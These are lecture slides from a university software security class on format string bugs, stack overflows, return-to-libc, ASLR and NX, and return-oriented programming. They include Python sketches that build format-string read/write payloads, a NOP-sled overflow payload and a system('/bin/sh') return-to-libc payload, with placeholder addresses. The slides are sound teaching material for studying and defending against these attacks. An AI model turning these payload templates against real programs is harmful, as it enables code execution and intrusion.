CSC 495/583 Topics of Software Security: Return-oriented programming (ROP). Class 8. Dr. Si Chen (schen@wcupa.edu)
Review
Format String Bug
Format String Bug: What is a Format String? A format string is an ASCII string that contains text and format parameters, for example:
printf("%s %d\n", str, a);
fprintf(stderr, "%s %d\n", str, a);
sprintf(buffer, "%s %d\n", str, a);
E.g. output: My name is Chen
Format String Bug The wrong way…
Example: fmt_wrong.c
Example: fmt_wrong.c %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x.%08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. the argument is passed directly to the “printf” function. the function didn’t find a corresponding variable or value on stack so it will start popping values off the stack
Advanced Usage: Format String Direct Access
What is this BUG used for? Disclose sensitive information: variable values, the saved EBP value, and the correct location for placing shellcode.
What is this BUG used for? Disclose the StackGuard canary, which lets an overflow bypass the stack check.
What is this BUG used for? Read data at any memory address: use %s to read from an arbitrary address. Write data to any memory address: printf can write as well as read, using %n.
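As a rough illustration of the read and write primitives, the sketch below builds format-string payloads for a 32-bit little-endian target. The target address 0x0804A028 and the argument index 7 are hypothetical; the real index depends on where the input buffer sits relative to printf's arguments, and an address containing a null byte would truncate the string.

```python
import struct


def build_read_payload(target_addr: int, arg_index: int) -> bytes:
    """Address first, then %N$s so printf treats that address as a char*."""
    return struct.pack("<I", target_addr) + f"%{arg_index}$s".encode()


def build_write_payload(target_addr: int, arg_index: int) -> bytes:
    """Address first, then %N$n so printf stores the count of bytes
    printed so far (here 4, the address itself) at that address."""
    return struct.pack("<I", target_addr) + f"%{arg_index}$n".encode()


# Hypothetical values, for illustration only.
read_payload = build_read_payload(0x0804A028, 7)
write_payload = build_write_payload(0x0804A028, 7)
print(read_payload)
print(write_payload)
```

The `%N$` form is the direct parameter access mentioned earlier: it selects the N-th argument without consuming the ones before it.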
What is this BUG used for? Disclose a library address. When ASLR is enabled, library addresses change on every run, so shellcode cannot call library functions (e.g. system()) at fixed addresses. Use this bug to disclose the address of one function in a given library; from that you can deduce the addresses of the other functions in the same library.
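The deduction works because ASLR moves a library as a whole, so the distance between two functions inside it stays constant. A minimal sketch of the arithmetic, assuming made-up offsets (real offsets must be read from the exact libc build on the target) and a made-up leaked address:

```python
# Hypothetical offsets of two functions inside one libc build.
PUTS_OFFSET = 0x5F140
SYSTEM_OFFSET = 0x3A940


def libc_base_from_leak(leaked_puts: int) -> int:
    """Base address = leaked runtime address minus the function's offset."""
    return leaked_puts - PUTS_OFFSET


def resolve(base: int, offset: int) -> int:
    """Runtime address of any other symbol in the same library."""
    return base + offset


leaked_puts = 0xF7E3F140  # hypothetical value disclosed by the bug
libc_base = libc_base_from_leak(leaked_puts)
system_addr = resolve(libc_base, SYSTEM_OFFSET)
print(hex(libc_base), hex(system_addr))
```

A quick sanity check in practice is that the computed base is page aligned (its low 12 bits are zero).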
ELF executable
ELF executable for Linux: Executable and Linkable Format (ELF)
Linux                                                    Windows
ELF file                                                 .exe (PE)
.so (shared object file)                                 .dll (dynamic-link library)
.a                                                       .lib (static library)
.o (object file, between compilation and linking)        .obj
ELF executable for Linux: ELF 32-bit LSB, dynamically linked
Shared library: a dynamically linked ELF is loaded by ld-linux.so.2, which is in charge of memory mapping, loading shared libraries, etc. You can then call functions in libc.so.6.
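The "32-bit LSB" description comes straight from the first bytes of the ELF header. The sketch below decodes the class, byte order, and file type from a header; the sample header is constructed by hand for illustration, and deciding whether a file is dynamically linked would additionally require walking the program headers, which is not shown.

```python
import struct

ELF_CLASS = {1: "32-bit", 2: "64-bit"}
ELF_DATA = {1: "LSB", 2: "MSB"}
ELF_TYPE = {1: "relocatable", 2: "executable", 3: "shared object"}


def describe_elf(header: bytes) -> str:
    """Decode e_ident[EI_CLASS], e_ident[EI_DATA] and e_type."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = header[4], header[5]
    endian = "<" if ei_data == 1 else ">"
    # e_type is a 16-bit field right after the 16-byte e_ident array.
    (e_type,) = struct.unpack_from(endian + "H", header, 16)
    return "ELF {} {}, {}".format(
        ELF_CLASS.get(ei_class, "unknown class"),
        ELF_DATA.get(ei_data, "unknown byte order"),
        ELF_TYPE.get(e_type, "other"),
    )


# Hand-built header: magic, class=1, data=1, version=1, padding, e_type=2.
sample_header = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9) + struct.pack("<H", 2)
description = describe_elf(sample_header)
print(description)
```

For a real file, the same function can be applied to the first 18 bytes read from disk in binary mode.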
Return-oriented programming (ROP)
Bad code versus bad behavior. (Diagram: attacker code leads to “bad” behavior; application code leads to “good” behavior.) Problem: this implication is false!
Return-oriented programming thesis: any sufficiently large program codebase allows arbitrary attacker computation and behavior, without code injection (in the absence of control-flow integrity).
Traditional Stack Overflow. Payload layout: NOP sled | payload (shellcode) | saved EIP
Traditional Stack Overflow. The simplest stack overflow exploit operates as follows: send a payload with a NOP sled, shellcode, and a pointer to the NOP sled. The pointer to the NOP sled overwrites the saved return address and thereby takes over the stored EIP. EIP now points into the attacker's machine code, and the program executes arbitrary code.
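The layout above can be sketched as a few lines of payload construction. The offset to the saved return address (64), the sled address (0xBFFFF510), and the placeholder "shellcode" (four int3 bytes) are all hypothetical; a real exploit measures these against the specific target.

```python
import struct

NOP = b"\x90"  # x86 no-operation instruction


def build_classic_payload(shellcode: bytes, offset_to_ret: int, sled_addr: int) -> bytes:
    """NOP sled + shellcode fill the buffer up to the saved return address,
    which is then overwritten with a pointer back into the sled."""
    sled_len = offset_to_ret - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode does not fit before the return address")
    return NOP * sled_len + shellcode + struct.pack("<I", sled_addr)


placeholder_shellcode = b"\xcc" * 4  # int3 breakpoints, not real shellcode
classic_payload = build_classic_payload(placeholder_shellcode, 64, 0xBFFFF510)
print(len(classic_payload), classic_payload[-4:])
```

The sled makes the exploit tolerant of small errors in the guessed address: landing anywhere in the run of NOPs slides execution into the shellcode.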
Industry response to code injection exploits: mark all writable locations in a process' address space as nonexecutable. Deployment: Linux (via PaX patches); OpenBSD; Windows (since XP SP2); OS X (since 10.5); … Hardware support: Intel “XD” bit, AMD “NX” bit (and many RISC processors).
Traditional Stack Overflow. Pros: very easy to trigger; simple to understand; being able to inject code means our payloads are powerful and flexible. Cons: defeated by simply making the stack non-executable; lots of problems with bad characters, buffer sizes, payload detection, etc.
Return-to-libc. Payload layout: padding | address of system() | address of exit() | pointer to “/bin/sh”
Return-to-libc. Used primarily to streamline exploitation and to bypass mitigations and situational limitations. We want to spawn a shell: send a payload that overwrites the saved EIP with the address of system(), followed by the address of exit() and a pointer to “/bin/sh”. When system() finishes, it returns directly to exit(), which then shuts down the program cleanly.
Return-to-libc. Divert the control flow of the exploited program into libc code: system(), printf(), … No code injection is required. Perception of return-into-libc: limited and easy to defeat. The attacker cannot execute arbitrary code, and relies on the contents of libc (so remove system()?).
Return-to-libc
Pros
▫ Does not need an executable stack
▫ Also pretty easy to understand and implement
Cons
▫ Relies on access to library functions
▫ Can only execute sequential instructions, no branching or fancy stuff
▫ Can only use code in .text and loaded libraries
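A minimal sketch of that payload for 32-bit x86, assuming the cdecl convention where a function finds its return address at the top of the stack and its first argument just above it. All three addresses and the padding length are hypothetical placeholders.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian word."""
    return struct.pack("<I", value)


def build_ret2libc(offset_to_ret: int, system_addr: int,
                   exit_addr: int, binsh_addr: int) -> bytes:
    return (
        b"A" * offset_to_ret   # padding up to the saved EIP
        + p32(system_addr)     # saved EIP now points to system()
        + p32(exit_addr)       # return address seen by system()
        + p32(binsh_addr)      # first argument of system(): "/bin/sh"
    )


# Hypothetical addresses, for illustration only.
ret2libc_payload = build_ret2libc(
    offset_to_ret=64,
    system_addr=0xF7E1A940,
    exit_addr=0xF7E0D7B0,
    binsh_addr=0xF7F5B00B,
)
print(ret2libc_payload[64:].hex())
```

Nothing in this payload is executable data: every word after the padding is an address of code or data already present in the process.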
Mitigation against these classical attacks: Address Space Layout Randomization (ASLR); No-execute bit (NX)
Address Space Layout Randomization (ASLR): maps your heap and stack at random addresses. At each execution, the heap and stack are mapped at different places, and the same holds for shared libraries. So you can no longer jump to a hardcoded address as in a classical attack.
Address Space Layout Randomization (ASLR). (Figure: three executions of the same binary.)
Data Execution Prevention (DEP): No eXecute bit (NX). The NX bit is a CPU feature. On Intel CPUs it works only on x86_64 or with Physical Address Extension (PAE) enabled. When the feature is enabled, the CPU raises an exception if it tries to execute code from a page that has the NX bit set. The NX bit is located and set up in the Page Table Entry.
Page Table Each process in a multi-tasking OS runs in its own memory sandbox. This sandbox is the virtual address space, which in 32-bit mode is always a 4GB block of memory addresses. These virtual addresses are mapped to physical memory by page tables, which are maintained by the operating system kernel and consulted by the processor. Each process has its own set of page tables.
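Page Table. Each virtual page has one corresponding page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record holding the physical page address and flag bits.
Data Execution Prevention (DEP): No eXecute bit (NX). The last (most significant) bit of the 8-byte PTE used with PAE or in 64-bit mode is the NX bit (exb): 0 = NX disabled (the page is executable); 1 = NX enabled (the page is not executable).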
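To make the bit layout concrete, here is a small sketch that decodes a few flags of an 8-byte x86 page table entry (the PAE / 64-bit format, where bit 63 is NX). The sample PTE values are invented for illustration.

```python
PTE_PRESENT = 1 << 0    # page is mapped
PTE_WRITABLE = 1 << 1   # writes allowed
PTE_USER = 1 << 2       # accessible from user mode
PTE_NX = 1 << 63        # no-execute: instruction fetches fault
FRAME_MASK = 0x000FFFFFFFFFF000  # bits 12..51: physical page address


def decode_pte(pte: int) -> dict:
    return {
        "present": bool(pte & PTE_PRESENT),
        "writable": bool(pte & PTE_WRITABLE),
        "user": bool(pte & PTE_USER),
        "no_execute": bool(pte & PTE_NX),
        "frame": pte & FRAME_MASK,
    }


def is_writable_and_executable(pte: int) -> bool:
    """True for the mapping DEP is meant to eliminate: writable with NX clear."""
    return bool(pte & PTE_WRITABLE) and not (pte & PTE_NX)


stack_pte = 0x8000000012345067   # hypothetical stack page, NX set
legacy_pte = 0x0000000012345067  # same page with NX clear
stack_info = decode_pte(stack_pte)
print(stack_info, is_writable_and_executable(legacy_pte))
```

With DEP in force, a stack page looks like `stack_pte`: injected shellcode can still be written there, but fetching an instruction from it faults.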
ROP Introduction
[1] Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC (October 2008).
[2] Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Return-Oriented Programming: Exploits Without Code Injection. Retrieved 2009-08-12.
Ordinary programming: the machine level. The instruction pointer (%eip) determines which instruction to fetch and execute. Once the processor has executed the instruction, it automatically increments %eip to the next instruction. Control flow is implemented by changing the value of %eip.
Return-oriented programming: the machine level. (Diagram: the stack holds pointers to instruction sequences in the C library, each of the form "insns … ret".) The stack pointer (%esp) determines which instruction sequence to fetch and execute. The processor doesn't automatically increment %esp, but the “ret” at the end of each instruction sequence does.
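The role of %esp as a "program counter" can be sketched with a toy simulation. This is not real machine code: the gadget addresses (0x1000, 0x2000, 0x3000) and the three gadgets are invented, and each Python function stands for the instructions that precede a gadget's final ret.

```python
class Machine:
    def __init__(self, stack):
        self.stack = list(stack)
        self.esp = 0  # index of the top of the stack
        self.regs = {"eax": 0, "ebx": 0}

    def pop(self) -> int:
        value = self.stack[self.esp]
        self.esp += 1
        return value


def pop_eax(m):      # models "pop %eax; ret"
    m.regs["eax"] = m.pop()


def pop_ebx(m):      # models "pop %ebx; ret"
    m.regs["ebx"] = m.pop()


def add_eax_ebx(m):  # models "add %ebx, %eax; ret"
    m.regs["eax"] = (m.regs["eax"] + m.regs["ebx"]) & 0xFFFFFFFF


# Hypothetical gadget addresses.
GADGETS = {0x1000: pop_eax, 0x2000: pop_ebx, 0x3000: add_eax_ebx}


def run_chain(stack):
    m = Machine(stack)
    while m.esp < len(m.stack):
        target = m.pop()          # "ret": pop the next gadget address
        gadget = GADGETS.get(target)
        if gadget is None:
            break                 # unknown address: stop the simulation
        gadget(m)
    return m.regs


final_regs = run_chain([0x1000, 40, 0x2000, 2, 0x3000])
print(final_regs)
```

The attacker-controlled stack is the whole program here: it interleaves gadget addresses with the data those gadgets pop, and only the ret at the end of each gadget advances execution.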
ROP: The Main Idea
ROP Gadget “The Gadget”: July 1945
Attack Process on x86. So, the real execution is: Gadget1 is executed and returns; Gadget2 is executed and returns; Gadget3 is executed and returns.
Several ways to find gadgets. How can we find gadgets? Old-school method: objdump and grep. Some gadgets will not be found this way, because objdump only disassembles at the intended instruction boundaries and misses sequences that start in the middle of an instruction. Make your own tool which scans an executable segment. Use an existing tool.
Finding instruction sequences. Any instruction sequence ending in “ret” is useful, since it could be part of a gadget. Algorithmic problem: recover all sequences of valid instructions from libc that end in a “ret” insn. Idea: at each ret (c3 byte), look back: are the preceding i bytes a valid length-i insn? Recurse from the instructions found. Collect the instruction sequences in a trie.
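A heavily simplified sketch of the look-back idea follows. Instead of a full x86 decoder it recognizes only the one-byte "pop r32" opcodes (0x58 to 0x5f), and it returns a flat list rather than a trie; both are simplifications made here for brevity. The sample bytes and base address are invented.

```python
RET = 0xC3
POP_R32 = {
    0x58: "eax", 0x59: "ecx", 0x5A: "edx", 0x5B: "ebx",
    0x5C: "esp", 0x5D: "ebp", 0x5E: "esi", 0x5F: "edi",
}


def find_pop_ret_gadgets(code: bytes, base: int = 0):
    """At every c3 byte, walk backwards while the preceding byte decodes
    as a one-byte pop, emitting one gadget per starting offset."""
    gadgets = []
    for i, byte in enumerate(code):
        if byte != RET:
            continue
        insns = ["ret"]
        gadgets.append((base + i, "ret"))
        j = i - 1
        while j >= 0 and code[j] in POP_R32:
            insns.insert(0, "pop " + POP_R32[code[j]])
            gadgets.append((base + j, "; ".join(insns)))
            j -= 1
    return gadgets


# Intended decoding is a single instruction: mov eax, 0x00c35b58.
# Starting one byte in, the immediate decodes as pop eax; pop ebx; ret.
sample_code = bytes.fromhex("b8585bc300")
found = find_pop_ret_gadgets(sample_code, base=0x08048000)
for addr, text in found:
    print(hex(addr), text)
```

The sample shows why scanning at every byte offset matters: none of these gadgets appear in a disassembly of the intended instruction stream.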
ROPgadget
Q & A